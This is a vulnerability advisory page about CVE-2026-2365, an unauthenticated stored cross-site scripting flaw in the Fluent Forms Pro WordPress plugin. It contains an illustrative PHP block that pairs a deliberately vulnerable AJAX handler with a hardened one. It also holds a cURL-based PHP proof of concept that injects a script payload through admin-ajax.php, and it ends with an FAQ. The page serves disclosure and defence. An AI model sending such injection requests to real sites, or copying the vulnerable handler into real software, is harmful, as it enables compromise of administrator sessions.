Atomic Edge analysis of CVE-2026-2365 (metadata-based):
The vulnerability exists in the Fluent Forms Pro WordPress plugin. The root cause is an unauthenticated AJAX endpoint with insufficient input sanitization and output escaping. The `fluentform_step_form_save_data` AJAX action is publicly accessible without authentication or nonce verification. This allows unauthenticated attackers to submit draft form data containing malicious scripts. The plugin stores this data without proper sanitization. The stored scripts execute when an administrator views the partial form entry in the WordPress dashboard. The CVSS vector indicates network attack vector, low attack complexity, no privileges required, no user interaction, and scope change with low confidentiality and integrity impact. The fix likely requires adding authentication or capability checks to the AJAX handler, implementing nonce verification, and applying proper sanitization (e.g., `sanitize_text_field`) and output escaping (e.g., `esc_html` or `wp_kses`). The impact includes session hijacking, administrative account compromise, and site defacement via stored XSS payloads. These conclusions about the endpoint and missing security controls are inferred from the CWE and description, not confirmed via code review.
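The analysis above names the controls it expects the fix to add: nonce verification, validation of the request, sanitization on storage, and escaping on output. The block below is an added, illustrative example written for this page; it is not code from Fluent Forms Pro or Atomic Edge. Only the action name `fluentform_step_form_save_data` comes from the page. The nonce action name `ff_step_save`, the `form_id`/`step_data` parameters, the field names, and storage through `update_option()` are assumptions chosen to keep the example self-contained. It shows the vulnerable handler shape next to a hardened one, plus an admin render function that escapes on output.

```php
<?php
// Added example for this page, not Fluent Forms Pro's code. Hook name
// fluentform_step_form_save_data is from the advisory; the nonce action
// 'ff_step_save', the option key, and the field names are assumptions.

// ---- Vulnerable shape, as the analysis describes it: no nonce, no type
// ---- validation, raw values persisted and later rendered unescaped.
function ff_step_save_vulnerable() {
    $form_id   = $_POST['form_id'];
    $step_data = json_decode( wp_unslash( $_POST['step_data'] ), true );
    update_option( 'ff_draft_' . $form_id, $step_data ); // <script> stored as-is
    wp_send_json_success();
}

// ---- Hardened shape: nonce, identifier validation, per-field sanitization.
function ff_step_save_hardened() {
    // 1. Nonce: the form page must embed wp_create_nonce( 'ff_step_save' ) in a
    //    'nonce' field. Passing false as the third argument makes
    //    check_ajax_referer() return instead of calling wp_die().
    if ( ! check_ajax_referer( 'ff_step_save', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid request token.' ), 403 );
    }

    // 2. Validate identifiers: form_id must be a positive integer.
    $form_id = absint( $_POST['form_id'] ?? 0 );
    if ( 0 === $form_id ) {
        wp_send_json_error( array( 'message' => 'Invalid form id.' ), 400 );
    }

    // 3. Parse the payload and reject anything that is not the expected shape.
    $raw     = isset( $_POST['step_data'] ) ? wp_unslash( $_POST['step_data'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) || ! isset( $decoded['fields'] ) || ! is_array( $decoded['fields'] ) ) {
        wp_send_json_error( array( 'message' => 'Malformed step data.' ), 400 );
    }

    // 4. Sanitize every field before it reaches storage.
    $clean = ff_sanitize_fields( $decoded['fields'] );

    update_option( 'ff_draft_' . $form_id, $clean, false );
    wp_send_json_success( array( 'saved' => count( $clean ) ) );
}

/**
 * Recursively sanitize submitted field values. Keys are reduced to slugs,
 * plain-text values go through sanitize_text_field() (which strips tags),
 * and one assumed rich-text field ('message') keeps the wp_kses_post() allowlist.
 */
function ff_sanitize_fields( array $fields ) {
    $clean = array();
    foreach ( $fields as $key => $value ) {
        $key = sanitize_key( $key );
        if ( is_array( $value ) ) {
            $clean[ $key ] = ff_sanitize_fields( $value );
        } elseif ( 'message' === $key ) {
            $clean[ $key ] = wp_kses_post( (string) $value );
        } else {
            $clean[ $key ] = sanitize_text_field( (string) $value );
        }
    }
    return $clean;
}

// ---- Admin view: capability check and escaping on output, independent of
// ---- whatever earlier code may have written into storage.
function ff_render_draft( $form_id ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }
    $fields = get_option( 'ff_draft_' . absint( $form_id ), array() );
    echo '<table class="widefat">';
    foreach ( $fields as $key => $value ) {
        $shown = is_array( $value ) ? wp_json_encode( $value ) : (string) $value;
        // esc_html() renders a stored <script> tag as literal text, not markup.
        echo '<tr><th>' . esc_html( $key ) . '</th><td>' . esc_html( $shown ) . '</td></tr>';
    }
    echo '</table>';
}

// Draft saving stays available to logged-out visitors, but only through the
// hardened handler; the vulnerable function is never registered.
add_action( 'wp_ajax_fluentform_step_form_save_data', 'ff_step_save_hardened' );
add_action( 'wp_ajax_nopriv_fluentform_step_form_save_data', 'ff_step_save_hardened' );
```

Two points worth noting from a defender's side. A nonce still works for logged-out users (it is tied to user ID 0 and the session token), but it will fail on sites that serve the form page from a full-page cache, so sanitization on storage and escaping on output must not depend on the nonce alone. Escaping on output is also what neutralizes drafts that were already stored before an update: patching the handler stops new payloads, but entries saved earlier remain in the database until the render path escapes them or they are purged.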

CVE-2026-2365: Fluent Forms Pro <= 6.1.17 – Unauthenticated Stored Cross-Site Scripting via Draft Form Submission (fluentformpro)
CVE ID: CVE-2026-2365
Plugin slug: fluentformpro
Affected versions: <= 6.1.17
Proof of Concept (PHP)
NOTICE:
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2365 - Fluent Forms Pro <= 6.1.17 - Unauthenticated Stored Cross-Site Scripting via Draft Form Submission
// Parameter names and the step_data structure below are inferred from the
// CVE metadata; they were not confirmed against the plugin source.
$target_url = 'https://example.com';
// WordPress AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Payload to inject JavaScript that triggers on admin page view
$payload = '<script>alert(document.domain)</script>';
// Construct POST data for the vulnerable AJAX action
$post_data = [
    'action'    => 'fluentform_step_form_save_data',
    'form_id'   => '1', // Assumes at least one form exists
    'step_data' => json_encode([
        'fields' => [
            'input_field' => $payload
        ]
    ])
];
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Output results
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "Payload injected successfully.\n";
    echo "The script will execute when an administrator views the draft submission.\n";
} else {
    echo "Injection failed. HTTP Code: $http_code\n";
    echo "Response: $response\n";
}
?>
Frequently Asked Questions
What is CVE-2026-2365?
Understanding the vulnerability
CVE-2026-2365 is a high-severity vulnerability in the Fluent Forms Pro plugin for WordPress that allows unauthenticated stored cross-site scripting via draft form submissions. The flaw arises from an AJAX endpoint that is publicly accessible without proper authentication or input sanitization.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to submit malicious scripts through the `fluentform_step_form_save_data` AJAX action. These scripts are stored by the plugin and can execute when an administrator views the form entry, potentially compromising the site.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using Fluent Forms Pro version 6.1.17 or earlier is affected. Site administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Fluent Forms Pro plugin installed. If it is version 6.1.17 or earlier, your site is at risk and should be updated immediately.
What is the recommended fix for this vulnerability?
Mitigation steps
The recommended fix is to update the Fluent Forms Pro plugin to the latest version where the vulnerability has been addressed. Additionally, implementing proper input sanitization and authentication checks in the AJAX handler is crucial.
What does a CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high-severity vulnerability. This means that the vulnerability poses a significant risk, allowing attackers to exploit it with minimal effort and without needing authentication.
How does the proof of concept demonstrate the vulnerability?
Explaining the demonstration code
The proof of concept provided shows how an attacker can use cURL to send a crafted request to the vulnerable AJAX endpoint, injecting a script that executes when an administrator views the form data. This highlights the ease of exploitation due to the lack of security controls.
What are the potential impacts of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can lead to session hijacking, administrative account compromise, and site defacement. Attackers can execute arbitrary scripts in the context of the administrator’s session.
What additional security measures should I consider?
Enhancing overall security
In addition to updating the plugin, consider implementing web application firewalls, regular security audits, and user role management to limit access to sensitive areas of your WordPress site.
Is there a way to test for this vulnerability?
Testing for exposure
Security professionals can test for this vulnerability by attempting to submit a draft form with a malicious payload through the AJAX endpoint. However, this should only be done in a controlled environment and with permission.
How can I stay informed about vulnerabilities like this?
Keeping updated on security
To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database for updates on vulnerabilities affecting WordPress plugins.